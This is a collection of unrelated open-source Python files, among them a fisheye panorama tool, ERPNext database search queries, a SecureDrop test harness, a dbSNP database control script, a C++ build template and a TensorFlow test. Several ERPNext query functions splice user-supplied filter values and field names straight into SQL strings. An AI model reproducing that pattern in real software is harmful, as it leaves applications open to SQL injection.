tkstr = tk.StringVar()
# Create callback event handler.
cmd = lambda: self._file_select(tkstr)
# Create the Label, Entry, and Button objects.
label = tk.Label(parent, text=label)
entry = tk.Entry(parent, textvariable=tkstr)
button = tk.Button(parent, text='...', command=cmd)
label.grid(row=rowidx, column=0, sticky='W')
entry.grid(row=rowidx, column=1)
button.grid(row=rowidx, column=2)
return tkstr
# Set status text, and optionally update cursor.
def _set_status(self, status, cursor='arrow'):
self.parent.config(cursor=cursor)
self.status.configure(text=status)
def launch_tk_gui(flens='', fimg1='', fimg2=''):
# Create TK root object and GUI window.
root = tk.Tk()
gui = PanoramaGUI(root)
# Load parameters if specified.
if flens is not None and len(flens) > 0:
gui.load_config(flens)
if fimg1 is not None and len(fimg1) > 0:
gui.img1.set(fimg1)
if fimg2 is not None and len(fimg2) > 0:
gui.img2.set(fimg2)
# Start main loop.
root.mainloop()
if __name__ == "__main__":
# If we have exactly four arguments, run command-line version.
if len(sys.argv) == 5 and sys.argv[4].startswith('gui'):
# Special case for interactive mode.
launch_tk_gui(sys.argv[1], sys.argv[2], sys.argv[3])
elif len(sys.argv) == 5:
# First argument is the lens alignment file.
lens1 = FisheyeLens()
lens2 = FisheyeLens()
cfg = open(sys.argv[1], 'r')
load_config(cfg, lens1, lens2)
# Second and third arguments are the source files.
img1 = FisheyeImage(sys.argv[2], lens1)
img2 = FisheyeImage(sys.argv[3], lens2)
# Fourth argument is the mode and output filename.
if sys.argv[4].startswith('cube='):
            out = sys.argv[4][5:]
pan = PanoramaImage((img1, img2))
pan.render_cubemap(1024).save(out)
elif sys.argv[4].startswith('rect='):
            out = sys.argv[4][5:]
pan = PanoramaImage((img1, img2))
pan.render_equirectangular(1024).save(out)
else:
print 'Unrecognized render mode (cube=, rect=, gui)'
elif len(sys.argv) > 1:
# If requested, print command-line usage information.
print 'Usage instructions:'
print ' python fisheye.py'
print ' Start interactive alignment GUI.'
print ' python fisheye.py -help'
print ' Print this help message.'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg gui'
print ' Launch interactive GUI with specified default options'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg rect=out.png'
print ' Render and save equirectangular panorama using specified'
print ' lens configuration and source images.'
print ' python fisheye.py lens.cfg in1.jpg in2.jpg cube=out.png'
print ' Render and save cubemap panorama using specified'
print ' lens configuration and source images.'
else:
# Otherwise, start the interactive GUI with all fields blank.
launch_tk_gui()
| ooterness/DualFisheye | fisheye.py | Python | mit | 44,517 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.desk.reportview import get_match_cond
from frappe.model.db_query import DatabaseQuery
from frappe.utils import nowdate
def get_filters_cond(doctype, filters, conditions):
if filters:
if isinstance(filters, dict):
filters = filters.items()
flt = []
for f in filters:
if isinstance(f[1], basestring) and f[1][0] == '!':
flt.append([doctype, f[0], '!=', f[1][1:]])
else:
flt.append([doctype, f[0], '=', f[1]])
query = DatabaseQuery(doctype)
query.filters = flt
query.conditions = conditions
query.build_filter_conditions(flt, conditions)
cond = ' and ' + ' and '.join(query.conditions)
else:
cond = ''
return cond
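# Illustrative sketch (field names and values are hypothetical): a filters
# dict such as {"item_group": "Products", "customer": "!ACME"} is expanded to
#     [[doctype, "item_group", "=", "Products"],
#      [doctype, "customer", "!=", "ACME"]]
# before DatabaseQuery.build_filter_conditions() turns it into the " and ..."
# fragment returned as cond and spliced in as {fcond} in the queries below.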
# searches for active employees
def employee_query(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select name, employee_name from `tabEmployee`
where status = 'Active'
and docstatus < 2
and ({key} like %(txt)s
or employee_name like %(txt)s)
{mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, employee_name), locate(%(_txt)s, employee_name), 99999),
name, employee_name
limit %(start)s, %(page_len)s""".format(**{
'key': searchfield,
'mcond': get_match_cond(doctype)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len
})
# searches for leads which are not converted
def lead_query(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select name, lead_name, company_name from `tabLead`
where docstatus < 2
and ifnull(status, '') != 'Converted'
and ({key} like %(txt)s
or lead_name like %(txt)s
or company_name like %(txt)s)
{mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, lead_name), locate(%(_txt)s, lead_name), 99999),
if(locate(%(_txt)s, company_name), locate(%(_txt)s, company_name), 99999),
name, lead_name
limit %(start)s, %(page_len)s""".format(**{
'key': searchfield,
'mcond':get_match_cond(doctype)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len
})
# searches for customer
def customer_query(doctype, txt, searchfield, start, page_len, filters):
cust_master_name = frappe.defaults.get_user_default("cust_master_name")
if cust_master_name == "Customer Name":
fields = ["name", "customer_group", "territory"]
else:
fields = ["name", "customer_name", "customer_group", "territory"]
fields = ", ".join(fields)
return frappe.db.sql("""select {fields} from `tabCustomer`
where docstatus < 2
and ({key} like %(txt)s
or customer_name like %(txt)s)
{mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, customer_name), locate(%(_txt)s, customer_name), 99999),
name, customer_name
limit %(start)s, %(page_len)s""".format(**{
"fields": fields,
"key": searchfield,
"mcond": get_match_cond(doctype)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len
})
# searches for supplier
def supplier_query(doctype, txt, searchfield, start, page_len, filters):
supp_master_name = frappe.defaults.get_user_default("supp_master_name")
if supp_master_name == "Supplier Name":
fields = ["name", "supplier_type"]
else:
fields = ["name", "supplier_name", "supplier_type"]
fields = ", ".join(fields)
return frappe.db.sql("""select {field} from `tabSupplier`
where docstatus < 2
and ({key} like %(txt)s
or supplier_name like %(txt)s)
{mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, supplier_name), locate(%(_txt)s, supplier_name), 99999),
name, supplier_name
limit %(start)s, %(page_len)s """.format(**{
'field': fields,
'key': searchfield,
'mcond':get_match_cond(doctype)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len
})
def tax_account_query(doctype, txt, searchfield, start, page_len, filters):
tax_accounts = frappe.db.sql("""select name, parent_account from tabAccount
where tabAccount.docstatus!=2
and account_type in (%s)
and is_group = 0
and company = %s
and `%s` LIKE %s
limit %s, %s""" %
(", ".join(['%s']*len(filters.get("account_type"))), "%s", searchfield, "%s", "%s", "%s"),
tuple(filters.get("account_type") + [filters.get("company"), "%%%s%%" % txt,
start, page_len]))
if not tax_accounts:
tax_accounts = frappe.db.sql("""select name, parent_account from tabAccount
where tabAccount.docstatus!=2 and is_group = 0
and company = %s and `%s` LIKE %s limit %s, %s"""
% ("%s", searchfield, "%s", "%s", "%s"),
(filters.get("company"), "%%%s%%" % txt, start, page_len))
return tax_accounts
def item_query(doctype, txt, searchfield, start, page_len, filters):
conditions = []
return frappe.db.sql("""select tabItem.name,
if(length(tabItem.item_name) > 40,
concat(substr(tabItem.item_name, 1, 40), "..."), item_name) as item_name,
if(length(tabItem.description) > 40, \
            concat(substr(tabItem.description, 1, 40), "..."), description) as description
from tabItem
where tabItem.docstatus < 2
and ifnull(tabItem.has_variants, 0)=0
and (tabItem.end_of_life > %(today)s or ifnull(tabItem.end_of_life, '0000-00-00')='0000-00-00')
and (tabItem.`{key}` LIKE %(txt)s
or tabItem.item_name LIKE %(txt)s
or tabItem.description LIKE %(txt)s)
{fcond} {mcond}
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, item_name), locate(%(_txt)s, item_name), 99999),
name, item_name
limit %(start)s, %(page_len)s """.format(key=searchfield,
fcond=get_filters_cond(doctype, filters, conditions),
mcond=get_match_cond(doctype)),
{
"today": nowdate(),
"txt": "%%%s%%" % txt,
"_txt": txt.replace("%", ""),
"start": start,
"page_len": page_len
})
def bom(doctype, txt, searchfield, start, page_len, filters):
conditions = []
return frappe.db.sql("""select tabBOM.name, tabBOM.item
from tabBOM
where tabBOM.docstatus=1
and tabBOM.is_active=1
and tabBOM.%(key)s like "%(txt)s"
%(fcond)s %(mcond)s
limit %(start)s, %(page_len)s """ % {'key': searchfield, 'txt': "%%%s%%" % frappe.db.escape(txt),
'fcond': get_filters_cond(doctype, filters, conditions),
'mcond':get_match_cond(doctype), 'start': start, 'page_len': page_len})
def get_project_name(doctype, txt, searchfield, start, page_len, filters):
cond = ''
if filters.get('customer'):
cond = '(`tabProject`.customer = "' + filters['customer'] + '" or ifnull(`tabProject`.customer,"")="") and'
return frappe.db.sql("""select `tabProject`.name from `tabProject`
where `tabProject`.status not in ("Completed", "Cancelled")
and %(cond)s `tabProject`.name like "%(txt)s" %(mcond)s
order by `tabProject`.name asc
limit %(start)s, %(page_len)s """ % {'cond': cond,'txt': "%%%s%%" % frappe.db.escape(txt),
'mcond':get_match_cond(doctype),'start': start, 'page_len': page_len})
def get_delivery_notes_to_be_billed(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select `tabDelivery Note`.name, `tabDelivery Note`.customer_name
from `tabDelivery Note`
where `tabDelivery Note`.`%(key)s` like %(txt)s and
`tabDelivery Note`.docstatus = 1 %(fcond)s and
(ifnull((select sum(qty) from `tabDelivery Note Item` where
`tabDelivery Note Item`.parent=`tabDelivery Note`.name), 0) >
ifnull((select sum(qty) from `tabSales Invoice Item` where
`tabSales Invoice Item`.docstatus = 1 and
`tabSales Invoice Item`.delivery_note=`tabDelivery Note`.name), 0))
%(mcond)s order by `tabDelivery Note`.`%(key)s` asc
limit %(start)s, %(page_len)s""" % {
"key": searchfield,
"fcond": get_filters_cond(doctype, filters, []),
"mcond": get_match_cond(doctype),
"start": "%(start)s", "page_len": "%(page_len)s", "txt": "%(txt)s"
}, { "start": start, "page_len": page_len, "txt": ("%%%s%%" % txt) })
def get_batch_no(doctype, txt, searchfield, start, page_len, filters):
if not filters.get("posting_date"):
filters["posting_date"] = nowdate()
batch_nos = None
args = {
'item_code': filters.get("item_code"),
'warehouse': filters.get("warehouse"),
'posting_date': filters.get('posting_date'),
'txt': "%{0}%".format(txt),
"start": start,
"page_len": page_len
}
if args.get('warehouse'):
batch_nos = frappe.db.sql("""select sle.batch_no, round(sum(sle.actual_qty),2), sle.stock_uom, batch.expiry_date
from `tabStock Ledger Entry` sle
INNER JOIN `tabBatch` batch on sle.batch_no = batch.name
where
sle.item_code = %(item_code)s
and sle.warehouse = %(warehouse)s
and sle.batch_no like %(txt)s
and batch.docstatus < 2
and (ifnull(batch.expiry_date, '')='' or batch.expiry_date >= %(posting_date)s)
{match_conditions}
group by batch_no having sum(sle.actual_qty) > 0
order by batch.expiry_date, sle.batch_no desc
limit %(start)s, %(page_len)s""".format(match_conditions=get_match_cond(doctype)), args)
if batch_nos:
return batch_nos
else:
return frappe.db.sql("""select name, expiry_date from `tabBatch`
where item = %(item_code)s
and name like %(txt)s
and docstatus < 2
and (ifnull(expiry_date, '')='' or expiry_date >= %(posting_date)s)
{match_conditions}
order by expiry_date, name desc
limit %(start)s, %(page_len)s""".format(match_conditions=get_match_cond(doctype)), args)
def get_account_list(doctype, txt, searchfield, start, page_len, filters):
filter_list = []
if isinstance(filters, dict):
for key, val in filters.items():
if isinstance(val, (list, tuple)):
filter_list.append([doctype, key, val[0], val[1]])
else:
filter_list.append([doctype, key, "=", val])
elif isinstance(filters, list):
filter_list.extend(filters)
if "is_group" not in [d[1] for d in filter_list]:
filter_list.append(["Account", "is_group", "=", "0"])
if searchfield and txt:
filter_list.append([doctype, searchfield, "like", "%%%s%%" % txt])
return frappe.desk.reportview.execute("Account", filters = filter_list,
fields = ["name", "parent_account"],
limit_start=start, limit_page_length=page_len, as_list=True)
| indictranstech/tele-erpnext | erpnext/controllers/queries.py | Python | agpl-3.0 | 10,512 |
# -*- coding: utf-8 -*-
from datetime import datetime
import errno
import mock
from multiprocessing import Process
import os
from os.path import abspath, dirname, join, realpath
import signal
import socket
import time
import traceback
import requests
from Cryptodome import Random
from selenium import webdriver
from selenium.common.exceptions import (WebDriverException,
NoAlertPresentException)
from selenium.webdriver.firefox import firefox_binary
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions
os.environ['SECUREDROP_ENV'] = 'test' # noqa
import config
import db
import journalist
from source_app import create_app
import crypto_util
import tests.utils.env as env
LOG_DIR = abspath(join(dirname(realpath(__file__)), '..', 'log'))
# https://stackoverflow.com/a/34795883/837471
class alert_is_not_present(object):
""" Expect an alert to not be present."""
def __call__(self, driver):
try:
alert = driver.switch_to.alert
alert.text
return False
except NoAlertPresentException:
return True
class FunctionalTest(object):
def _unused_port(self):
s = socket.socket()
s.bind(("localhost", 0))
port = s.getsockname()[1]
s.close()
return port
def _create_webdriver(self, firefox, profile=None):
# see https://review.openstack.org/#/c/375258/ and the
# associated issues for background on why this is necessary
connrefused_retry_count = 3
connrefused_retry_interval = 5
for i in range(connrefused_retry_count + 1):
try:
driver = webdriver.Firefox(firefox_binary=firefox,
firefox_profile=profile)
if i > 0:
# i==0 is normal behavior without connection refused.
print('NOTE: Retried {} time(s) due to '
'connection refused.'.format(i))
return driver
except socket.error as socket_error:
if (socket_error.errno == errno.ECONNREFUSED
and i < connrefused_retry_count):
time.sleep(connrefused_retry_interval)
continue
raise
def _prepare_webdriver(self):
log_file = open(join(LOG_DIR, 'firefox.log'), 'a')
log_file.write(
'\n\n[%s] Running Functional Tests\n' % str(
datetime.now()))
log_file.flush()
return firefox_binary.FirefoxBinary(log_file=log_file)
def setup(self, session_expiration=30):
# Patch the two-factor verification to avoid intermittent errors
self.patcher = mock.patch('db.Journalist.verify_token')
self.mock_journalist_verify_token = self.patcher.start()
self.mock_journalist_verify_token.return_value = True
self.patcher2 = mock.patch('source_app.main.get_entropy_estimate')
self.mock_get_entropy_estimate = self.patcher2.start()
self.mock_get_entropy_estimate.return_value = 8192
signal.signal(signal.SIGUSR1, lambda _, s: traceback.print_stack(s))
env.create_directories()
self.gpg = env.init_gpg()
db.init_db()
source_port = self._unused_port()
journalist_port = self._unused_port()
self.source_location = "http://localhost:%d" % source_port
self.journalist_location = "http://localhost:%d" % journalist_port
# Allow custom session expiration lengths
self.session_expiration = session_expiration
def start_source_server():
# We call Random.atfork() here because we fork the source and
# journalist server from the main Python process we use to drive
# our browser with multiprocessing.Process() below. These child
# processes inherit the same RNG state as the parent process, which
# is a problem because they would produce identical output if we
# didn't re-seed them after forking.
Random.atfork()
config.SESSION_EXPIRATION_MINUTES = self.session_expiration
source_app = create_app(config)
source_app.run(
port=source_port,
debug=True,
use_reloader=False,
threaded=True)
def start_journalist_server():
Random.atfork()
journalist.app.run(
port=journalist_port,
debug=True,
use_reloader=False,
threaded=True)
self.source_process = Process(target=start_source_server)
self.journalist_process = Process(target=start_journalist_server)
self.source_process.start()
self.journalist_process.start()
for tick in range(30):
try:
requests.get(self.source_location)
requests.get(self.journalist_location)
except:
time.sleep(1)
else:
break
if not hasattr(self, 'override_driver'):
self.driver = self._create_webdriver(self._prepare_webdriver())
# Polls the DOM to wait for elements. To read more about why
# this is necessary:
#
# http://www.obeythetestinggoat.com/how-to-get-selenium-to-wait-for-page-load-after-a-click.html
#
# A value of 5 is known to not be enough in some cases, when
        # the machine hosting the tests is slow, which is why it was
        # raised to 10. Setting the value to 60 or more would surely
        # cover even the slowest of machines. However, it also means
# that a test failing to find the desired element in the DOM
# will only report failure after 60 seconds which is painful
        # for quick debugging.
#
self.driver.implicitly_wait(10)
# Set window size and position explicitly to avoid potential bugs due
# to discrepancies between environments.
self.driver.set_window_position(0, 0)
self.driver.set_window_size(1024, 768)
self.secret_message = ('These documents outline a major government '
'invasion of privacy.')
def wait_for_source_key(self, source_name):
filesystem_id = crypto_util.hash_codename(source_name)
def key_available(filesystem_id):
assert crypto_util.getkey(filesystem_id)
self.wait_for(
lambda: key_available(filesystem_id), timeout=60)
def teardown(self):
self.patcher.stop()
env.teardown()
if not hasattr(self, 'override_driver'):
self.driver.quit()
self.source_process.terminate()
self.journalist_process.terminate()
def wait_for(self, function_with_assertion, timeout=5):
"""Polling wait for an arbitrary assertion."""
# Thanks to
# http://chimera.labs.oreilly.com/books/1234000000754/ch20.html#_a_common_selenium_problem_race_conditions
start_time = time.time()
while time.time() - start_time < timeout:
try:
return function_with_assertion()
except (AssertionError, WebDriverException):
time.sleep(0.1)
# one more try, which will raise any errors if they are outstanding
return function_with_assertion()
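    # Usage sketch (illustrative; the element id is hypothetical):
    #     self.wait_for(lambda: self.driver.find_element_by_id('submit-button'))
    # retries the callable every 0.1s, swallowing AssertionError and
    # WebDriverException, until it succeeds or the timeout expires.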
def _alert_wait(self):
WebDriverWait(self.driver, 10).until(
expected_conditions.alert_is_present(),
'Timed out waiting for confirmation popup.')
def _alert_accept(self):
self.driver.switch_to.alert.accept()
WebDriverWait(self.driver, 10).until(
alert_is_not_present(),
'Timed out waiting for confirmation popup to disappear.')
def _alert_dismiss(self):
self.driver.switch_to.alert.dismiss()
WebDriverWait(self.driver, 10).until(
alert_is_not_present(),
'Timed out waiting for confirmation popup to disappear.')
| garrettr/securedrop | securedrop/tests/functional/functional_test.py | Python | agpl-3.0 | 8,117 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import os
import glob
import argparse
from pprint import pformat
from lib.termcolor import colored
from cmd import run, force, cd
from log import Logger
log = Logger(__name__)
DBSNP_HOME = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DBSNP_BUILDS = ['b147', 'b146', 'b144']
DBSNP_DEFAULT = 'b146'
GENOME_BUILDS = ['GRCh38', 'GRCh37']
GENOME_DEFAULT = 'GRCh37'
PLUGINS = ['freq']
BUILD_TARGETS = ['core'] + PLUGINS
VERSION = open(os.path.join(DBSNP_HOME, 'VERSION')).readline().strip()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--version', action='version', version='%(prog)s {}'.format(VERSION))
parser.add_argument('--dbsnp-build', default=DBSNP_DEFAULT, choices=DBSNP_BUILDS, help='dbSNP build ID')
parser.add_argument('--genome-build', default=GENOME_DEFAULT, choices=GENOME_BUILDS, help='reference genome build ID')
parser.add_argument('--prefix', default='dbsnp', help='prefix for database name')
subparsers = parser.add_subparsers()
parser_restore = subparsers.add_parser('restore', help='restore database from pg_dump')
parser_restore.add_argument('--tag', default=VERSION, help='dbsnp-pg release tag')
parser_restore.set_defaults(func=restore)
parser_build = subparsers.add_parser('build', help='build database from resources')
parser_build.add_argument('--target', nargs='+', default=BUILD_TARGETS, choices=BUILD_TARGETS, help='build targets')
parser_build.set_defaults(func=build)
parser_init_demo = subparsers.add_parser('init-demo', help='init demo database')
parser_init_demo.add_argument('--demo-db-name', default='dbsnp_demo', help='demo database name')
parser_init_demo.add_argument('--demo-db-user', default='dbsnp_demo', help='demo database user')
parser_init_demo.set_defaults(func=init_demo)
args = parser.parse_args()
args.func(args)
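# Example invocations (illustrative; the tag and database names are
# hypothetical). Note that the global options defined on the top-level parser
# must appear before the subcommand:
#     ./dbsnp-pg-ctl.py restore --tag v1.0.0
#     ./dbsnp-pg-ctl.py --dbsnp-build b147 --genome-build GRCh38 build --target core freq
#     ./dbsnp-pg-ctl.py init-demo --demo-db-name dbsnp_demo --demo-db-user dbsnp_demo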
def restore(args):
context = {
'dbsnp_build': args.dbsnp_build,
'genome_build': args.genome_build,
'prefix': args.prefix,
'tag': args.tag,
}
context['db_src_name'] = 'dbsnp_{dbsnp_build}_{genome_build}'.format(**context)
context['db_name'] = '{prefix}_{dbsnp_build}_{genome_build}'.format(**context)
context['db_user'] = 'dbsnp'
log.info(colored(pformat(context), 'blue'))
with cd(DBSNP_HOME):
force('createuser {db_user}'.format(**context))
run('./script/pg_restore.sh {db_src_name} {db_name} {db_user} {tag}'.format(**context))
log.info('Done')
log.info('To connect via psql, run:')
log.info('')
log.info(colored('$ psql {db_name} -U {db_user}'.format(**context), 'blue', attrs=['bold']))
log.info('')
def build(args):
context = {
'dbsnp_build': args.dbsnp_build,
'genome_build': args.genome_build,
'prefix': args.prefix,
'target': args.target,
}
context['db_name'] = '{prefix}_{dbsnp_build}_{genome_build}'.format(**context)
context['db_user'] = 'dbsnp'
log.info(colored(pformat(context), 'blue'))
with cd(DBSNP_HOME):
force('createuser {db_user}'.format(**context))
force('createdb --owner={db_user} {db_name}'.format(**context))
target = [DBSNP_HOME] if 'core' in args.target else []
target += [os.path.join(DBSNP_HOME, 'contrib', x) for x in set(args.target) if x != 'core']
for src in target:
with cd(src):
run('pwd')
if glob.glob('02_drop_create_table.*'):
context.update(src=src)
run('./01_fetch_data.sh -d {dbsnp_build} -r {genome_build} {src}/data'.format(**context))
run('./02_drop_create_table.sh {db_name} {db_user} {src}'.format(**context))
run('./03_import_data.sh {db_name} {db_user} {src} {src}/data'.format(**context))
log.info('Done')
log.info('To connect via psql, run:')
log.info('')
log.info(colored('$ psql {db_name} -U {db_user}'.format(**context), 'blue', attrs=['bold']))
log.info('')
def init_demo(args):
context = {
'db_user': args.demo_db_user,
'db_name': args.demo_db_name,
}
log.info(colored(pformat(context), 'blue'))
with cd(DBSNP_HOME):
force('createuser {db_user}'.format(**context))
force('createdb --owner={db_user} {db_name}'.format(**context))
for src in [DBSNP_HOME] + glob.glob(DBSNP_HOME + '/contrib/*'):
with cd(src):
run('pwd')
if glob.glob('02_drop_create_table.*'):
context.update(src=src)
run('./02_drop_create_table.sh {db_name} {db_user} {src}'.format(**context))
run('./03_import_data.sh {db_name} {db_user} {src} {src}/test/data'.format(**context))
log.info('Done')
log.info('To connect via psql, run:')
log.info('')
log.info(colored('$ psql {} -U {}'.format(args.demo_db_name, args.demo_db_user), 'blue', attrs=['bold']))
log.info('')
if __name__ == '__main__':
main()
| knmkr/dbsnp-pg | script/python/dbsnp-pg-ctl.py | Python | agpl-3.0 | 5,098 |
#!/usr/bin/env python3
import sys
import os
import mvtools_exception
import terminal_colors
import get_platform
import generic_run
import path_utils
import standard_cpp
"""
build.py
A Python template for building C++ programs
This script is supposed to be integrated similar to
the following structure:
(project)/
(project)/proj/ (project files; codelite, codeblocks, visual studio, xcode, makefiles, etc)
(project)/proj/pybuild
(project)/proj/pybuild/pybuild_cpp.py (this script)
(project)/build/ (intermediate/object files - by platform, arch and mode)
(project)/build/linux_x64_debug
(project)/build/linux_x64_release
(project)/run/ (final files/runtime folder - by platform, arch and mode)
(project)/run/linux_x64_debug
(project)/run/linux_x64_release
(project)/src
(project)/lib
(project)/lib/third_party
... and so on.
"""
def makedir_if_needed(path):
if not os.path.exists(path):
os.mkdir(path)
return True
return False
def unroll_path_dirname(path):
local_path = ""
dirname_subpath = path_utils.dirname_filtered(path)
if dirname_subpath is None:
return ""
dirname_subpath_pieces = path_utils.splitpath(dirname_subpath, "no")
for dsp in dirname_subpath_pieces:
local_path += "%s_" % dsp
return local_path
class Builder():
def __init__(self, basepath, appname, sources, options):
self.basepath = basepath
self.options = self.parseoptions(options)
self.compiler = "g++"
self.appname = appname
self.src = sources
self.src_base = "../../src/"
self.obj_base = "../../build/"
self.run_base = "../../run/"
self.include = []
self.include.append("-I%s" % self.src_base)
self.plat = get_platform.getplat()
self.arch = get_platform.getarch()
self.mode = self.options["mode"]
self.target = self.plat + "_" + self.arch + "_" + self.mode
self.obj_full = self.obj_base + self.target
self.run_full = self.run_base + self.target
self.app_full_name = self.run_full + "/" + self.appname
self.all_objs = [(unroll_path_dirname(x) + path_utils.replace_extension(path_utils.basename_filtered(x), ".cpp", ".o")) for x in self.src]
# compiler / linker flags
self.compiler_flags_common = []
self.compiler_flags_debug = []
self.compiler_flags_release = []
self.linker_flags_common = []
self.linker_flags_debug = []
self.linker_flags_release = []
# standard C++ hook - will add compiler / linker flags depending on the compiler, platform, mode, etc
self.standard_cpp_hook()
# select compiler flags to actually use
self.compiler_flags_to_use = self.compiler_flags_common
if self.mode == "debug":
self.compiler_flags_to_use += self.compiler_flags_debug
elif self.mode == "release":
self.compiler_flags_to_use += self.compiler_flags_release
# select linker flags to actually use
self.linker_flags_to_use = self.linker_flags_common
if self.mode == "debug":
self.linker_flags_to_use += self.linker_flags_debug
elif self.mode == "release":
self.linker_flags_to_use += self.linker_flags_release
def standard_cpp_hook(self):
# common compiler flags
if self.plat == get_platform.PLAT_LINUX and self.compiler == "g++":
self.compiler_flags_common += standard_cpp.get_cpp_compiler_flags_linux_gcc()
if self.plat == get_platform.PLAT_WINDOWS and self.compiler == "g++":
self.compiler_flags_common += standard_cpp.get_cpp_compiler_flags_windows_gcc()
if self.plat == get_platform.PLAT_MACOSX and self.compiler == "g++":
self.compiler_flags_common += standard_cpp.get_cpp_compiler_flags_macosx_gcc()
# debug compiler flags
if self.mode == "debug" and self.compiler == "g++":
self.compiler_flags_debug += standard_cpp.get_cpp_compiler_flags_debug_gcc()
# release compiler flags
if self.mode == "release" and self.compiler == "g++":
self.compiler_flags_release += standard_cpp.get_cpp_compiler_flags_release_gcc()
# common linker flags
self.linker_flags_common += [] # currently NOP
# debug linker flags
if self.mode == "debug" and self.compiler == "g++":
self.linker_flags_debug += standard_cpp.get_cpp_linker_flags_debug_gcc()
# release linker flags
if self.mode == "release" and self.compiler == "g++":
self.linker_flags_release += standard_cpp.get_cpp_linker_flags_release_gcc()
def parseoptions(self, options):
opts = {}
# fill in defaults
opts["mode"] = "release"
opts["target"] = "all"
# other possible options: type (static, shared)
if options is None:
return opts
if "release" in options:
opts["mode"] = "release"
if "debug" in options:
opts["mode"] = "debug"
if "clean" in options:
opts["target"] = "clean"
if "compile" in options:
opts["target"] = "compile"
if "link" in options:
opts["target"] = "link"
if "rebuild" in options:
opts["target"] = "rebuild"
if "all" in options:
opts["target"] = "all"
return opts
def run(self):
if self.options["target"] == "clean":
self.do_clean()
elif self.options["target"] == "compile":
self.do_compile()
elif self.options["target"] == "link":
self.do_link()
elif self.options["target"] == "rebuild":
self.do_rebuild()
elif self.options["target"] == "all":
self.do_all()
def do_structure(self):
makedir_if_needed(self.obj_base)
makedir_if_needed(self.run_base)
makedir_if_needed(self.obj_full)
makedir_if_needed(self.run_full)
def do_clean(self):
for o in self.all_objs:
cmd = ["rm"]
full_obj = self.obj_full + "/" + o
cmd.append(full_obj)
self.call_cmd(cmd)
cmd = ["rm", self.app_full_name]
self.call_cmd(cmd)
def do_compile(self):
for s in self.src:
cmd = [self.compiler]
if len(self.include) > 0:
for i in self.include:
cmd.append(i)
cmd += self.compiler_flags_to_use
cmd += ["-c", self.src_base + s, "-o", self.obj_full + "/" + unroll_path_dirname(s) + path_utils.replace_extension(path_utils.basename_filtered(s), ".cpp", ".o")]
self.call_cmd(cmd)
def do_link(self):
cmd = [self.compiler, "-o", self.app_full_name]
cmd += [self.obj_full + "/" + x for x in self.all_objs]
if len(self.linker_flags_to_use) > 0:
for l in self.linker_flags_to_use:
cmd.append(l)
self.call_cmd(cmd)
def do_rebuild(self):
self.do_clean()
self.do_all()
def do_all(self):
self.do_structure()
self.do_compile()
self.do_link()
def call_cmd(self, cmd):
cmd_str = ""
for c in cmd:
cmd_str += "%s " % c
cmd_str = cmd_str.rstrip()
v, r = generic_run.run_cmd_simple(cmd)
if not v:
raise mvtools_exception.mvtools_exception("%s: Failed: [%s]" % (cmd_str, r.rstrip()))
print("%s: Command succeeded." % cmd_str)
if __name__ == "__main__":
appname = "testapp"
src = ["main.cpp", "subfolder/second.cpp"]
basepath = os.path.abspath(path_utils.dirname_filtered(sys.argv[0]))
opt = None
if len(sys.argv) > 1:
opt = sys.argv[1:]
bd = Builder(basepath, appname, src, opt)
try:
bd.run()
except mvtools_exception.mvtools_exception as mvtex:
print("%s%s%s" % (terminal_colors.TTY_RED, mvtex, terminal_colors.TTY_WHITE))
sys.exit(1)
print("%s%s%s" % (terminal_colors.TTY_GREEN, "All succeeded.", terminal_colors.TTY_WHITE))
| mvendra/mvtools | codegen/templates/pybuild/pybuild_cpp.py | Python | mit | 8,224 |
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for reduction ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import tensor_shape
from tensorflow.python.kernel_tests import gradient_checker
class SumReductionTest(tf.test.TestCase):
def _compare(self, x, reduction_axes, keep_dims, use_gpu=False):
np_ans = x
if reduction_axes is None:
np_ans = np.sum(np_ans, keepdims=keep_dims)
else:
reduction_axes = np.array(reduction_axes).astype(np.int32)
for ra in reduction_axes.ravel()[::-1]:
np_ans = np.sum(np_ans, axis=ra, keepdims=keep_dims)
with self.test_session(use_gpu=use_gpu):
tf_ans = tf.reduce_sum(x, reduction_axes, keep_dims)
out = tf_ans.eval()
self.assertAllClose(np_ans, out)
self.assertShapeEqual(np_ans, tf_ans)
def _compareAll(self, x, reduction_axes):
if reduction_axes is not None and np.shape(reduction_axes) == (1,):
# Test scalar reduction_axes argument
self._compareAll(x, reduction_axes[0])
self._compare(x, reduction_axes, False, use_gpu=True)
self._compare(x, reduction_axes, False, use_gpu=False)
